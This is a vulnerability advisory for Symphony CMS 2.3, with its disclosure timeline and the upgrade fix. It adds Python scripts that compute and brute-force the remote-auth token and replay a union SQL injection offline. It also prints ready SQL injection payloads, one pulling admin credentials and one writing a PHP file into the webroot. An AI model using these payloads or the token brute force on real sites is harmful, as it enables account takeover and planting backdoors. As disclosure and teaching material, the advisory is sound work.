Symphony is an XSLT-powered open source content management system. [ Taken from: http://getsymphony.com/ ]
Symphony-cms version 2.3 contains several vulnerabilities, ranging in severity from low to high, which chained together allow complete compromise of the system by an unauthenticated attacker.
- Discovered by: Eldar “Wireghoul” Marcussen
- Vendor: Symphony - http://getsymphony.com
- Affected versions: 2.3 (and possibly earlier)
Local path disclosure
Requesting a library file directly discloses the full local file path if PHP is configured to display errors, because the library script relies on the library path being declared in a global constant outside of the script itself.
User enumeration
The retrieve password URL http://host/path/symphony/login/retrieve-password/ displays a helpful error message if the entered email address does not exist in the database, allowing valid accounts to be enumerated.
Authentication token brute force
Symphony-cms allows a user to log in without entering their username and password via a remote auth URL that contains a token made up of the first 8 characters of a SHA-1 hash of the user's username and hashed password.
If a user has auth_token_active set to yes in the sym_authors table, an attacker can log in to their account by brute forcing the token, a key of the form [0-9a-f]^8, i.e. 16^8 = 2^32 (roughly 4.3 billion) possibilities. If the username and password hash are already known (for example through the SQL injection described below), the token can be computed directly instead.
The URL has the form http://host/path/symphony/login/[token]/, e.g. http://host/path/symphony/login/a39880be/ for the user "admin" with password "admin".
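The following script, added here as an illustration and not part of the advisory or of Symphony's code, computes the remote-auth token from a known username and password hash and shows what enumerating the whole keyspace costs. The advisory only states that the token is the first 8 characters of a SHA-1 over the username and hashed password; the concatenation order used below (username followed by the hash, no separator), the sample hash value and the 1000 requests per second figure are assumptions.

```python
"""Symphony CMS 2.3 remote-auth token: compute it from a known username and
password hash, or enumerate the token keyspace.

Added example, not part of the advisory or of Symphony's code. The advisory
states only that the token is the first 8 characters of a SHA-1 of the user's
username and hashed password; the concatenation order used here (username
followed by the hash, no separator) and the sample hash value are assumptions.
"""
import hashlib
from typing import Callable, Iterator, Optional

HEX_DIGITS = "0123456789abcdef"
TOKEN_LEN = 8


def remote_login_token(username: str, password_hash: str) -> str:
    """First 8 hex characters of sha1(username + password_hash).
    Assumption: Symphony concatenates the two values in this order."""
    digest = hashlib.sha1((username + password_hash).encode("utf-8")).hexdigest()
    return digest[:TOKEN_LEN]


def keyspace_size() -> int:
    """Distinct tokens an attacker must consider: 16^8 = 2^32."""
    return len(HEX_DIGITS) ** TOKEN_LEN


def worst_case_days(requests_per_second: float) -> float:
    """Time to exhaust the keyspace at a sustained request rate."""
    return keyspace_size() / requests_per_second / 86400


def token_url(base_url: str, token: str) -> str:
    """Remote-auth URL form given in the advisory: /symphony/login/<token>/."""
    return f"{base_url.rstrip('/')}/symphony/login/{token}/"


def candidate_tokens() -> Iterator[str]:
    """Every 8-character lowercase hex token, in counting order."""
    for n in range(keyspace_size()):
        yield f"{n:08x}"


def brute_force(is_valid: Callable[[str], bool],
                max_tries: Optional[int] = None) -> Optional[str]:
    """Try tokens until is_valid() accepts one or max_tries is reached.

    Against a live target, is_valid would GET token_url(base, tok) and report
    whether the response is a logged-in session rather than the login form.
    It is a callback here so the loop can be exercised offline.
    """
    for i, tok in enumerate(candidate_tokens()):
        if max_tries is not None and i >= max_tries:
            return None
        if is_valid(tok):
            return tok
    return None


if __name__ == "__main__":
    # Constructed sample values, not real Symphony data.
    username, pw_hash = "admin", "constructed-password-hash"
    tok = remote_login_token(username, pw_hash)
    print("token:", tok, "->", token_url("http://host/path", tok))
    print(f"keyspace: {keyspace_size()} tokens; "
          f"~{worst_case_days(1000):.1f} days at 1000 req/s")
    # Offline demonstration of the search loop against a known token.
    print("found:", brute_force(lambda t: t == "0000002a"))
```

The point of worst_case_days is that a 32-bit token is within reach of a patient attacker (weeks at a modest request rate, with no lockout on the URL), while a leaked password hash collapses the search to a single request.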
Cross site scripting
Reflected: The email input field supplied to http://host/path/symphony/login/retrieve-password/ is not sufficiently filtered for malicious characters, resulting in reflected cross site scripting.
PoC: Submit the form with the email address: ">
Reflected: The email input field supplied to http://host/path/symphony/login/ is not sufficiently filtered for malicious characters, resulting in reflected cross site scripting.
Persistent: The "From name" preference setting in Symphony-cms (http://host/path/symphony/system/preferences/) is not sufficiently encoded on output, resulting in persistent cross site scripting.
SQL injection
The username field on the author detail page is not sufficiently filtered when checking whether the username already exists in the system, resulting in blind SQL injection.
PoC: Edit an author's profile and update the username to include a malicious payload, e.g.: username' union select "" FROM sym_authors INTO OUTFILE '/var/www/workspace/haxed.php where the path for the outfile is taken from the local path disclosure described above.
The page id supplied when editing a page under blueprints is vulnerable to SQL injection.
We can retrieve a user's username, hashed password and auth token status with the following PoC: http://host/path/symphony/bluePRINTs/pages/edit/0%29+union+select+1,2,username,password,5,auth_token_active,7,8,9+from+sym_authors+where+id+=+1+--+/
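To make the mechanism behind both injections concrete, the script below (an added example, not from the advisory or from Symphony's source) reproduces the union-based page id injection offline and contrasts it with a parameterised lookup. It assumes the vulnerable query pastes the page id inside a parenthesised WHERE clause and selects 9 columns, which is what the payload's leading "0)" and its nine union columns imply; the sym_pages layout and every row of data are constructed. SQLite stands in for MySQL, so the INTO OUTFILE write from the username field cannot be reproduced here, but the string-concatenation root cause is the same.

```python
"""Union-based SQL injection through a numeric page id, reproduced offline.

Added example, not from the advisory or from Symphony's source. It assumes the
vulnerable query interpolates the page id inside a parenthesised WHERE clause
and selects 9 columns, which is what the advisory's payload
"0) union select 1,2,username,password,5,auth_token_active,7,8,9 ..." implies;
the sym_pages layout and all row data are constructed. SQLite stands in for
MySQL, so the INTO OUTFILE write used from the username field is not shown.
"""
import sqlite3
from typing import List, Tuple

# Payload from the advisory, before URL encoding.
PAYLOAD = ("0) union select 1,2,username,password,5,auth_token_active,7,8,9 "
           "from sym_authors where id = 1 -- ")

# Assumed 9-column layout of the page table the payload lines up against.
PAGE_COLUMNS = ("id, parent, title, handle, path, params, "
                "data_sources, events, sortorder")


def build_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for a Symphony database."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE sym_authors (
            id INTEGER, username TEXT, password TEXT, auth_token_active TEXT);
        INSERT INTO sym_authors VALUES
            (1, 'admin', 'constructed-password-hash', 'yes');
        CREATE TABLE sym_pages (
            id INTEGER, parent INTEGER, title TEXT, handle TEXT, path TEXT,
            params TEXT, data_sources TEXT, events TEXT, sortorder INTEGER);
        INSERT INTO sym_pages VALUES (1, 0, 'Home', 'home', '', '', '', '', 1);
    """)
    return db


def vulnerable_lookup(db: sqlite3.Connection, page: str) -> List[Tuple]:
    """Query shape the payload implies (assumed): the id is pasted into the SQL,
    so "0) union select ... -- " closes the condition, appends a second SELECT
    and comments out the original closing parenthesis."""
    sql = f"SELECT {PAGE_COLUMNS} FROM sym_pages WHERE (id = {page})"
    return db.execute(sql).fetchall()


def safe_lookup(db: sqlite3.Connection, page: str) -> List[Tuple]:
    """Same lookup with the id validated as an integer and bound as a parameter."""
    try:
        page_id = int(page)
    except ValueError:
        return []  # not a number: refuse rather than interpolate
    sql = f"SELECT {PAGE_COLUMNS} FROM sym_pages WHERE (id = ?)"
    return db.execute(sql, (page_id,)).fetchall()


def extract_credentials(rows: List[Tuple]) -> Tuple[str, str, str]:
    """Pull username, password hash and auth_token_active out of the
    positions the payload placed them in (columns 3, 4 and 6)."""
    row = rows[0]
    return row[2], row[3], row[5]


if __name__ == "__main__":
    db = build_db()
    rows = vulnerable_lookup(db, PAYLOAD)
    print("vulnerable:", rows)
    print("leaked:", extract_credentials(rows))
    print("safe:", safe_lookup(db, PAYLOAD))
```

With the page id forced to 0 the first SELECT matches nothing, so the only row that comes back is the one the attacker appended, and the username, hash and auth_token_active value appear in the columns where the page's title, handle and params would normally be rendered. The leaked hash is exactly what the remote-auth token described earlier is derived from.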
Unrestricted file upload
While file upload appears to be intended functionality for authorised users, combined with the vulnerabilities described above it becomes trivial for an unauthenticated attacker to place a backdoor on the system.
Solution
Upgrade to version 2.3.1.
Disclosure time line
- 17-Oct-2012 - Public disclosure
- 03-Oct-2012 - Issues patched in upcoming release
- 18-Sep-2012 - Patch checked into git
- 17-Sep-2012 - Vendor response
- 14-Sep-2012 - Vendor notified through email